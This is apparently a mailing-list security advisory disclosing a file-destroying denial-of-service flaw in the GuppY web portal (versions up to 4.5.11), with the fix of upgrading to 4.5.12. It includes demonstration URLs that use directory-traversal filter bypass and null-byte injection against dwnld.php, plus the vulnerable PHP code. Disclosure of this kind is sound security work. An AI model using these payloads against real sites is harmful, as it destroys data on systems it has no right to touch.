[KAPDA::#33] - GuppY <= 4.5.11 Remote DoS vulnerability



KAPDA New advisory

Vendor: http://www.freeguppy.org
Vulnerable: <= 4.5.11
Bug: Destroy database files (Remote DoS vulnerability)
Exploitation: Remote with browser
Exploit: available

Description:
--------------------
GuppY is a web portal intentionaly designed to be easy
to use for you,
the final user. It doesn't require any database to
run. It allows you
to create quickly and without any technical knowledge,
a complete and
interactive website.

Vulnerability:
--------------------

There is a high risk vulnerability in guppy <= 4.5.11
in 'dwnld.php'pages that may
allow remote attackers to destroy database files.(With
magic_quotes_gpc = Off
,Its possible to destroy any file that chmoded 666 via
null injection).
Furthermore, directory traversal filter bypassing,
using
%2E./ instead of ../

Demonstration URL:
--------------------
http://example.com/guppy/mobile/dwnld.php?pg=./%2E./stats
will replace content of stats.dtb with "1"
Or
http://example.com/guppy/dwnld.php?pg=./%2E./test.inc%00

Code Snippets:
--------------------
//dwnld.php
$dnldcounter = ReadDocCounter(DBBASE.$pg);
UpdateDocCounter($pg);

//log.inc
}
WriteDBFields(DBLOGH,$dblog);
}
$tabcounter = CompteVisites(DBIPSTATS, DBSTATS);
if ($tabcounter[0] > 0 && ($tabcounter[0]/10) ==
intval($tabcounter[0]/10)) {
WriteCounter(DBSTATSBK, $tabcounter[0]);
}


//functions.php
function WriteCounter($fic,$DataDB) {
$fhandle = fopen($fic, "w");
fputs($fhandle, $DataDB."\n");
fclose($fhandle);
}
..
..
..
function WriteDBFields($fic,$Fields) {
$fhandle = fopen($fic, "w");
$DataDB = "";
for ($i = 0; $i < count($Fields); $i++) {
for ($j = 0 ; $j < (count($Fields[$i])-1); $j++) {
$DataDB .= trim($Fields[$i][$j]).CONNECTOR;
}
$DataDB .=
trim($Fields[$i][count($Fields[$i])-1])."\n";
}
fputs($fhandle, $DataDB);
fclose($fhandle);
}
..
..
..
function ReadDocCounter($dirid) {
$DataDB = ReadCounter($dirid.DBEXT);
return $DataDB;
}

function WriteDocCounter($dirid,$DataDB) {
WriteCounter($dirid.DBEXT,$DataDB);
}

function UpdateDocCounter($id) {
$DataDB = ReadDocCounter(DBBASE.$id);
$vote = DejaVote(DBIPBASE.$id.DBEXT,300);
if ($vote[0] == false) {
$DataDB++;
WriteDocCounter(DBBASE.$id,$DataDB);
}
return $DataDB;
}

More details with Exploit:
--------------------
http://www.kapda.ir/advisory-291.html
In Farsi: http://irannetjob.com/content/view/204/28/

Solution:
--------------------
Upgrade to new version 4.5.12

Credit :
--------------------
Discovered by trueend5 (trueend5 kapda ir)
Computer Security Science Researchers Institute
[http://www.KAPDA.ir]


__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com



Relevant Pages

  • SecurityFocus Microsoft Newsletter #182
    ... Introducing the world's first and only complete Internal Security Gateway: ... Microsoft Windows XP Explorer.EXE Remote Denial of Service V... ... Apache Error Log Escape Sequence Injection Vulnerability ...
    (Focus-Microsoft)
  • SecurityFocus Microsoft Newsletter #131
    ... MICROSOFT VULNERABILITY SUMMARY ... Advanced Poll Remote Information Disclosure Vulnerability ... PHPNuke News Module Article.PHP SQL Injection Vulnerability ...
    (Focus-Microsoft)
  • SecurityFocus Microsoft Newsletter #171
    ... Better Management for Network Security ... GoodTech Telnet Server Remote Denial Of Service Vulnerabilit... ... ASPApp PortalAPP Remote User Database Access Vulnerability ...
    (Focus-Microsoft)
  • SecurityFocus Microsoft Newsletter #237
    ... MICROSOFT VULNERABILITY SUMMARY ... JPortal Banner.PHP SQL Injection Vulnerability ... Microsoft Windows Kernel Object Management Denial Of Service... ... Microsoft Windows Message Queuing Remote Buffer Overflow Vul... ...
    (Focus-Microsoft)
  • SecurityFocus Microsoft Newsletter #211
    ... MICROSOFT VULNERABILITY SUMMARY ... Microsoft Windows Kernel Local Denial of Service Vulnerabili... ... OCPortal Content Management System Remote File Include Vulne... ...
    (Focus-Microsoft)